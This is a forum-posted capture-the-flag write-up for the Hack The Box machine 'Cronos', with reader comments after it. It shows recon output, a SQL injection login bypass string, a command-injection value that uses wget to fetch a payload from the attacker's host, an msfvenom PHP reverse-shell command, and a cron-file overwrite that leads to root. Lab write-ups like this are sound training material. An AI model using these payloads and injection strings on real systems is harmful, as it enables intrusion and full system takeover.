Cronos write-up by hkh4cks

Machine: Cronos

OS: Linux

Target IP: 10.10.10.13

  • Nmap
$ nmap -T4 -A -sV  10.10.10.13 

Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-28 14:50 IST
Nmap scan report for 10.10.10.13
Host is up (0.21s latency).
Not shown: 997 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (EdDSA)
53/tcp open  domain  ISC BIND 9.10.3-P4-Ubuntu
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.17 seconds
  • Dirb
$ dirb http://10.10.10.13

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Jul 28 14:53:59 2017
URL_BASE: http://10.10.10.13/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.13/ ----
+ http://10.10.10.13/index.html (CODE:200|SIZE:12454)                                                                              
+ http://10.10.10.13/server-status (CODE:403|SIZE:299)                                                                    
                                                                                                                                                                                             
-----------------
END_TIME: Fri Jul 28 15:09:17 2017
DOWNLOADED: 4612 - FOUND: 2
  • It has DNS server

  • Add cronos.htb in /etc/hosts file

  • Dig

$dig @10.10.10.13 cronos.htb mx 
; <<>> DiG 9.10.3-P4-Debian <<>> @10.10.10.13 cronos.htb mx
; (1 server found)
;; global options: +cmd
;; Got answer:
;; -HEADER- opcode: QUERY, status: NOERROR, id: 31019
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;cronos.htb.			IN	MX

;; AUTHORITY SECTION:
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800

;; Query time: 269 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Fri Jul 28 20:28:38 IST 2017
;; MSG SIZE  rcvd: 81
  • Looks like we got a mail server.
  • Visit admin.cronos.htb.
  • There’s a SQLi in the username field. Enter admin' or 1=1;# in username field.
  • The input field in http://admin.cronos.htb/welcome.php is vulnerable to command injection.
  • Create php payload and upload it to the server.
$ msfvenom -p php/meterpreter_reverse_tcp lhost=10.10.15.16 LPORT=4444  > r2.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 27029 bytes
8.8.8.8; wget 10.10.15.16/r2.txt -P /var/www/admin/
  • Now rename the file from .txt to .php
  • We need to upload txt because we cannot upload php. Hence first upload txt and then rename to .php
  • Now start msfconsole and get the shell.
  • check /etc/crontab
$ cat crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * *	root	php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
  • The last scheduled activity executes a process called artisan located at /var/www/laravel
  • When we check the file’s permissions:
100755/rwxr-xr-x  1646     fil   2017-04-09 05:30:09 +0530  artisan
  • So we can replace this file with our paylaod.
  • Create a new payload and upload it here.
  • Rename it to artisan
  • Make it executable by chmod +x artisan
  • Put the current session of meterpreter to background and listen for the new connection
  • Wait for 1 minute as it executes every one minute
  • You’ll get root access

User and System Owned!

No need to replace, SInce its php you can execute your Binary/Payload with system command … You just need to add the following line system("location of binary") :wink: … BTW nice writeup! keep it up :+1:

Ha. I didn’t even notice that you could overwrite the Artisan binary and went about doing cronception by creating a scheduled task that would be executed by Artisan. Great find!

Larval stuff is shown around 16 minutes.

Awesome write up @hkh4cks, still one of my favorite boxes.

Thanks for the input guys
@ippsec always a fan of your walkthroughs. Thanks for making them! :smile:

good job @hkh4cks

Great write-up and walk-through indeed.

awsome write up!!

Great write up. Thanks for the contribution. :slight_smile:

Great write up. Thanks for sharing!

I don’t think we need meterpreter for this case, i know it is quicker easy, but some certifications limit it, so we have to learn to handle things without it.
I was able to upload a file with wget and with PHP extension.
No need to create a reverse shell with msfvenom, which for me the result was worse than the one line php reverse shell.

Great write up… thank you